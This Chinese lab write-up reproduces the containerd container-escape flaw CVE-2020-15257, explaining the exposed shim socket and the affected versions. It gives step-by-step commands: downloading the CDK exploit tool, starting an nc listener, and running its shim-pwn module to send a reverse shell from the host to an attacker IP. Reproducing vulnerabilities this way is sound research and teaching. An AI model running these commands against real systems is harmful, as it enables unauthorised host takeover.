Docker容器逃逸漏洞复现(CVE-2020-15257) – 作者:龙渊实验室LongYuanLab

一、漏洞介绍

漏洞原理

Containerd 是一个控制 runC 的守护进程,提供命令行客户端和API,用于在一个机器上管理容器。当在docker使用–net=host参数启动,与宿主机共享net namespace时,容器中的攻击者可以绕过访问权限访问 containerd 的控制API 进而导致权限提升,从而实现Docker容器逃逸。

Containerd是行业标准的容器运行时,可作为Linux和Windows的守护程序使用。在版本1.3.9和1.4.3之前的容器中,容器填充的API不正确地暴露给主机网络容器。填充程序的API套接字的访问控制验证了连接过程的有效UID为0,但没有以其他方式限制对抽象Unix域套接字的访问。这将允许在与填充程序相同的网络名称空间中运行的恶意容器(有效UID为0,但特权降低)导致新进程以提升的特权运行。

影响版本

containerd < 1.4.3

containerd < 1.3.9

实验环境:

被攻击机(ubuntu)ip:192.168.163.129

被攻击机containerd版本:1.2.6

攻击机(kali)ip:192.168.163.131

POC下载:https://github.com/Xyntax/CDK/releases/tag/0.1.6

二、环境介绍

01

被攻击机查看docker版本,显示Containerd Version : 1.2.6

命令:docker version

图片[1]-Docker容器逃逸漏洞复现(CVE-2020-15257) – 作者:龙渊实验室LongYuanLab-安全小百科

02

为了区分被攻击机的真实环境和被攻击机的docker环境分别在/root目录下面创建不同文件

被攻击机的docker环境:docker环境下面的/root目录下面没有文件,为了便于区分,复制一个dockerfile文件到/root目录下

图片[2]-Docker容器逃逸漏洞复现(CVE-2020-15257) – 作者:龙渊实验室LongYuanLab-安全小百科

被攻击机的真实环境:真实环境下面的/root目录放置了一个true文件

图片[3]-Docker容器逃逸漏洞复现(CVE-2020-15257) – 作者:龙渊实验室LongYuanLab-安全小百科

三、漏洞复现

01

被攻击机真实环境中列出被攻击机的容器

命令:docker ps

图片[4]-Docker容器逃逸漏洞复现(CVE-2020-15257) – 作者:龙渊实验室LongYuanLab-安全小百科

02

被攻击机以共享主机网络的方式启动容器,并且直接进入了docker容器

通过 –net=host 作为启动参数来运行一个容器(此处为了方便直接选择已经存在的容器vulhub/activemq:5.11.1,但是会单独再建立了一个容器,不会再下拉镜像,但是两个容器不相关)

命令:docker run -it –net=host vulhub/activemq:5.11.1 /bin/bash

图片[5]-Docker容器逃逸漏洞复现(CVE-2020-15257) – 作者:龙渊实验室LongYuanLab-安全小百科

03

被攻击机真实环境中列出被攻击机的容器列表,刚刚我们新建的容器为container id : 4ad4f620e6a5

命令:docker ps

图片[6]-Docker容器逃逸漏洞复现(CVE-2020-15257) – 作者:龙渊实验室LongYuanLab-安全小百科

04

在被攻击机docker容器中执行命令,可看到抽象命名空间Unix域套接字

命令:cat /proc/net/unix|grep -a “containerd-shim”

原理备注:containerd->containerd-shim->runc 的通信模型中,containerd-shim的接口作为abstract unix socket暴露,在docker使用–net=host参数启动、与宿主机共享net namespace时,其中的unix socket可以被容器内部访问到,容器中攻击者通过该socket可以通过API控制下游runc进程启动新的恶意镜像,并通过该镜像逃逸。

图片[7]-Docker容器逃逸漏洞复现(CVE-2020-15257) – 作者:龙渊实验室LongYuanLab-安全小百科

05

为了方便查看,被攻击机的docker环境下切换到/tmp目录下面进行操作。下载对应的poc并且进行解压操作。

下载poc命令:wget https://github.com/Xyntax/CDK/releases/download/0.1.6/cdk_v0.1.6_release.tar.gz

解压poc命令:tar -zxvf cdk_v0.1.6_release.tar.gz

图片[8]-Docker容器逃逸漏洞复现(CVE-2020-15257) – 作者:龙渊实验室LongYuanLab-安全小百科
图片[9]-Docker容器逃逸漏洞复现(CVE-2020-15257) – 作者:龙渊实验室LongYuanLab-安全小百科

06

kali攻击机开启监听端口12345

命令:nc -lvp 12345

图片[10]-Docker容器逃逸漏洞复现(CVE-2020-15257) – 作者:龙渊实验室LongYuanLab-安全小百科

07

被攻击机的docker环境中执行命令,利用poc建立起连接

命令:./cdk_linux_386 run shim-pwn 192.168.163.131 12345

图片[11]-Docker容器逃逸漏洞复现(CVE-2020-15257) – 作者:龙渊实验室LongYuanLab-安全小百科

08

Kali攻击机成功获取了被攻击机真实环境的反弹shell(从/root目录下的文件可看出反弹的为真实主机的shell)

图片[12]-Docker容器逃逸漏洞复现(CVE-2020-15257) – 作者:龙渊实验室LongYuanLab-安全小百科

备注:

本实验存在很多注意事项(只限于本人实验过程中的坑):

1、本来想使用vulhub的s2-032环境漏洞,利用Struts2工具远程命令执行进行docker逃逸,发现执行命令:cat /proc/net/unix|grep -a “containerd-shim”时无法看到抽象命名空间Unix域套接字,执行poc的时候显示Cannot find vulnerable socket(我使用的是docker exec -it 6970bdddacc6 /bin/bash进入的docker环境 )

2、注意利用–net=host新建容器的时候image名字是相同的,注意区分,否则执行的命令会进入另外一个容器

3、此利用条件是完全控制了被攻击机的docker容器的环境下执行的,利用被攻击机的docker环境控制被攻击机的真实环境。

原文链接

来源:freebuf.com 2021-01-12 09:38:30 by: 龙渊实验室LongYuanLab

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享
评论 抢沙发

请登录后发表评论